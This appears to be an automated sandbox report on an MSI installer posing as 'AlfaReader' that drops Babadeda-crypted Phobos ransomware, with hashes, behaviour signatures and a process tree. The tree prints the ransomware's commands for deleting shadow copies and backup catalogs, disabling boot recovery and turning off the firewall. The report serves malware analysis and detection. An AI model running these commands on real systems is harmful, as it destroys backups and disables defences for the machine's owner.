Analysis

  • max time kernel
    4294196s
  • max time network
    138s
  • platform
    windows7_x64
  • resource
    win7-20220223-en
  • submitted
    28-02-2022 18:42

General

  • Target

    7eb1b46c43a2290eb2631ea061da7258591e37da9f784e9dc890f1a27d292d9e.msi

  • Size

    5.8MB

  • MD5

    114daaf4ec2fa86c801300439044d946

  • SHA1

    9da80d1bed43da4c74f4a0957a580d4e7839f434

  • SHA256

    7eb1b46c43a2290eb2631ea061da7258591e37da9f784e9dc890f1a27d292d9e

  • SHA512

    ec9333ab61e3e61b4c373dc349d8ecff7145c6bc59b409b658ea2bd2c45ad441ce1a121ac9515764c8c2d2642c5175b8ca6d40328cf84f700dd156e2fbaeb8e0

Malware Config

Signatures

  • Babadeda

    Babadeda is a crypter delivered as a legitimate installer and used to drop other malware families.

  • Babadeda Crypter 3 IoCs
  • Phobos

    Phobos ransomware appeared at the beginning of 2019.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 8 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Deletes backup catalog 3 TTPs 4 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Executes dropped EXE 4 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Drops startup file 1 IoCs
  • Loads dropped DLL 63 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 4 IoCs
  • Drops desktop.ini file(s) 43 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Detects BABADEDA Crypter 3 IoCs

    Detects BABADEDA Crypter.

  • Interacts with shadow copies 2 TTPs 4 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\7eb1b46c43a2290eb2631ea061da7258591e37da9f784e9dc890f1a27d292d9e.msi
    1⤵
    • Blocklisted process makes network request
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:824
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Blocklisted process makes network request
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:956
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 1CA0DD9952A851B1122934DE4634C0B2
      2⤵
      • Loads dropped DLL
      PID:1884
    • C:\Users\Admin\AppData\Roaming\AlfaReader\lfaReader Install\AAMCustomHook.exe
      "C:\Users\Admin\AppData\Roaming\AlfaReader\lfaReader Install\AAMCustomHook.exe"
      2⤵
      • Executes dropped EXE
      PID:1736
    • C:\Users\Admin\AppData\Roaming\AlfaReader\lfaReader Install\PDapp.exe
      "C:\Users\Admin\AppData\Roaming\AlfaReader\lfaReader Install\PDapp.exe"
      2⤵
      • Executes dropped EXE
      • Drops startup file
      • Loads dropped DLL
      • Adds Run key to start application
      • Drops desktop.ini file(s)
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:944
      • C:\Users\Admin\AppData\Roaming\AlfaReader\lfaReader Install\PDapp.exe
        "C:\Users\Admin\AppData\Roaming\AlfaReader\lfaReader Install\PDapp.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Adds Run key to start application
        PID:1760
        • C:\Users\Admin\AppData\Roaming\AlfaReader\lfaReader Install\PDapp.exe
          "C:\Users\Admin\AppData\Roaming\AlfaReader\lfaReader Install\PDapp.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:1984
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:576
          • C:\Windows\system32\netsh.exe
            netsh advfirewall set currentprofile state off
            5⤵
            PID:2024
          • C:\Windows\system32\netsh.exe
            netsh firewall set opmode mode=disable
            5⤵
            PID:1532
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1708
          • C:\Windows\system32\vssadmin.exe
            vssadmin delete shadows /all /quiet
            5⤵
            • Interacts with shadow copies
            PID:820
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic shadowcopy delete
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1468
          • C:\Windows\system32\bcdedit.exe
            bcdedit /set {default} bootstatuspolicy ignoreallfailures
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:860
          • C:\Windows\system32\bcdedit.exe
            bcdedit /set {default} recoveryenabled no
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:948
          • C:\Windows\system32\wbadmin.exe
            wbadmin delete catalog -quiet
            5⤵
            • Deletes backup catalog
            PID:1544
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\info.hta"
          4⤵
          • Modifies Internet Explorer settings
          PID:2416
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\desktop\info.hta"
          4⤵
          • Modifies Internet Explorer settings
          PID:2440
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\info.hta"
          4⤵
          • Modifies Internet Explorer settings
          PID:2500
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe"
          4⤵
          PID:2524
          • C:\Windows\system32\vssadmin.exe
            vssadmin delete shadows /all /quiet
            5⤵
            • Interacts with shadow copies
            PID:2592
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic shadowcopy delete
            5⤵
            PID:2804
          • C:\Windows\system32\bcdedit.exe
            bcdedit /set {default} bootstatuspolicy ignoreallfailures
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2984
          • C:\Windows\system32\bcdedit.exe
            bcdedit /set {default} recoveryenabled no
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:3008
          • C:\Windows\system32\wbadmin.exe
            wbadmin delete catalog -quiet
            5⤵
            • Deletes backup catalog
            PID:3024
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1152
        • C:\Windows\system32\vssadmin.exe
          vssadmin delete shadows /all /quiet
          4⤵
          • Interacts with shadow copies
          PID:1640
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic shadowcopy delete
          4⤵
          PID:2208
        • C:\Windows\system32\bcdedit.exe
          bcdedit /set {default} bootstatuspolicy ignoreallfailures
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:2240
        • C:\Windows\system32\bcdedit.exe
          bcdedit /set {default} recoveryenabled no
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:2248
        • C:\Windows\system32\wbadmin.exe
          wbadmin delete catalog -quiet
          4⤵
          • Deletes backup catalog
          PID:2256
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1196
        • C:\Windows\system32\netsh.exe
          netsh advfirewall set currentprofile state off
          4⤵
          PID:1268
        • C:\Windows\system32\netsh.exe
          netsh firewall set opmode mode=disable
          4⤵
          PID:764
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\info.hta"
        3⤵
        • Modifies Internet Explorer settings
        PID:2408
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\desktop\info.hta"
        3⤵
        • Modifies Internet Explorer settings
        PID:2456
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\info.hta"
        3⤵
        • Modifies Internet Explorer settings
        PID:2468
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe"
        3⤵
        PID:2488
        • C:\Windows\system32\vssadmin.exe
          vssadmin delete shadows /all /quiet
          4⤵
          • Interacts with shadow copies
          PID:2584
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic shadowcopy delete
          4⤵
          PID:2796
        • C:\Windows\system32\bcdedit.exe
          bcdedit /set {default} bootstatuspolicy ignoreallfailures
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:2940
        • C:\Windows\system32\bcdedit.exe
          bcdedit /set {default} recoveryenabled no
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:3016
        • C:\Windows\system32\wbadmin.exe
          wbadmin delete catalog -quiet
          4⤵
          • Deletes backup catalog
          PID:3032
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:824
  • C:\Windows\system32\wbengine.exe
    "C:\Windows\system32\wbengine.exe"
    1⤵
    PID:848
  • C:\Windows\System32\vdsldr.exe
    C:\Windows\System32\vdsldr.exe -Embedding
    1⤵
    PID:844
  • C:\Windows\System32\vds.exe
    C:\Windows\System32\vds.exe
    1⤵
    PID:632

Network

MITRE ATT&CK Enterprise v6

Downloads

  • memory/824-54-0x000007FEFBD61000-0x000007FEFBD63000-memory.dmp

    Filesize

    8KB

  • memory/944-111-0x00000000020A0000-0x00000000020B3000-memory.dmp

    Filesize

    76KB

  • memory/944-131-0x0000000003F90000-0x0000000008190000-memory.dmp

    Filesize

    66.0MB

  • memory/1884-58-0x0000000074FF1000-0x0000000074FF3000-memory.dmp

    Filesize

    8KB

  • memory/1984-128-0x0000000001FA0000-0x0000000001FB3000-memory.dmp

    Filesize

    76KB

  • memory/1984-133-0x0000000003E60000-0x0000000008060000-memory.dmp

    Filesize

    66.0MB